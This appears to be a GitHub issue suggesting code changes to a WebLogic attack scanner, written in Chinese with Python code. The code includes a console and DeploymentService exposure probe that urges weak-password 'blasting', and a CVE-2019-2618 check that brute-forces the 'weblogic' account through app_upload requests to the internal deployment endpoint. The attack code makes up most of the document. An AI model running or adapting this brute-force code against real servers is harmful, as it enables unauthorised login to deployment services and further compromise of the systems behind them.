
修改建议 #3

@huayanqiaq

Description

@huayanqiaq

增加和修复了一些东西
WeblogicConsole.py修改为
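class WeblogicCosole(object):
    """Report whether a WebLogic host answers on its console or deployment path.

    Two fixed paths are requested over plain HTTP, in order: the console
    login form, then the internal DeploymentService endpoint. The first one
    that answers with status 200 is reported as exposed; if neither does,
    a "not found" line is logged and printed.

    Exceptions raised by ``requests`` (connection refused, timeout, ...)
    are not caught here and propagate to the caller.
    """

    headers = {'user-agent': 'ceshi/0.0.1'}

    # Paths probed by islive() and islive2() respectively.
    _CONSOLE_PATH = '/console/login/LoginForm.jsp'
    _DEPLOY_PATH = '/bea_wls_deployment_internal/DeploymentService'

    # Seconds to wait for a response. Without a timeout, requests.get()
    # blocks indefinitely on a host that accepts the connection but never
    # answers, which stalls the whole scan.
    _TIMEOUT = 10

    @staticmethod
    def _url(host, port, path):
        """Build ``http://host:port`` + *path*; host and port are passed through str()."""
        return 'http://' + str(host) + ':' + str(port) + path

    def _status(self, url):
        """GET *url* with the class headers and return the HTTP status code."""
        r = requests.get(url, headers=self.headers, timeout=self._TIMEOUT)
        return r.status_code

    def _report_exposed(self, u):
        """Log and print the "exposed" finding for the path *u*.

        The same wording is used for both probed paths, so a hit on the
        DeploymentService endpoint is also reported as "console address".
        """
        logging.info(
            "[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(
                u))
        print(
            Color.OKBLUE + "[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(
                u) + Color.ENDC)
        print(Color.OKGREEN + '[+]Weblogic后台路径存在' + Color.ENDC)

    def process(self, ip, port):
        """Entry point: run the exposure check against *ip*:*port*."""
        self.run(ip, port)

    def islive(self, ur, port):
        """Return the HTTP status of the console login form on *ur*:*port*."""
        return self._status(self._url(ur, port, self._CONSOLE_PATH))

    def islive2(self, ur, port):
        """Return the HTTP status of the DeploymentService endpoint on *ur*:*port*."""
        return self._status(self._url(ur, port, self._DEPLOY_PATH))

    def run(self, url, port):
        """Probe both paths and report the first that answers 200.

        The deployment endpoint is only requested when the console login
        form did not answer 200.
        """
        if self.islive(url, port) == 200:
            self._report_exposed(self._url(url, port, self._CONSOLE_PATH))
        elif self.islive2(url, port) == 200:
            self._report_exposed(self._url(url, port, self._DEPLOY_PATH))
        else:
            logging.info('[-]Target Weblogic console address not found!')
            print(Color.FAIL + "[-]Target Weblogic console address not found!" + Color.ENDC)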

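# CVE-2019-2618.py, changed to the following (on many WebLogic servers this is
# not the first deployment, so the random string changes):
def check(self, url):
    """Test the ``weblogic`` account on DeploymentService against a password list.

    For every entry of ``passwd`` (defined outside this block) an
    ``app_upload`` request is posted to
    ``<url>/bea_wls_deployment_internal/DeploymentService`` with the
    credentials carried in the ``username``/``password`` request headers.
    The loop stops at the first response that is neither a 401 nor contains
    the string "290014".

    A hit means the deployment account accepts a password from the list;
    the finding to act on is rotating that credential and restricting
    access to the internal deployment path.
    """
    vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
    # Single-quoted so the double quotes required by the multipart header
    # are part of the string instead of terminating it.
    payload = '------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name="file"; filename="11.tmp"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--'
    success = False
    for password in passwd:
        headers = {
            'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
            "username": "weblogic",
            "password": password,
            'wl_request_type': "app_upload",
            'wl_upload_application_name': "/",
            'archive': "true",
        }
        try:
            # A timeout keeps one unresponsive host from blocking the run.
            req = requests.post(url=vuln_url, data=payload, headers=headers, timeout=10)
        except Exception:
            # Best effort: show the failure and continue with the next
            # entry. KeyboardInterrupt is no longer swallowed, so the run
            # can be stopped from the terminal.
            traceback.print_exc()
            continue
        # NOTE(review): "290014" is presumably the server's message id for
        # rejected credentials - confirm. Any other non-401 answer (for
        # example a 404 from a host without this endpoint) is also counted
        # as accepted, which can yield false positives.
        if "290014" not in req.text and req.status_code != 401:
            print(Color.OKBLUE + "[+]口令爆破成功:weblogic/" + password + Color.ENDC)
            # The follow-up steps of the earlier version (server name
            # extraction, random directory lookup, upload test) are disabled
            # in this revision. The flag is still set so that the
            # "not Vul" line below is not printed right after a credential
            # was accepted; the vulnerability itself stays unconfirmed.
            success = True
            break
        print(Color.FAIL + "[-]口令爆破失败:weblogic/" + password + Color.ENDC)
    if not success:
        print(Color.FAIL + "[-]target Weblogic is not Vul CVE-2019-2618" + Color.ENDC)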
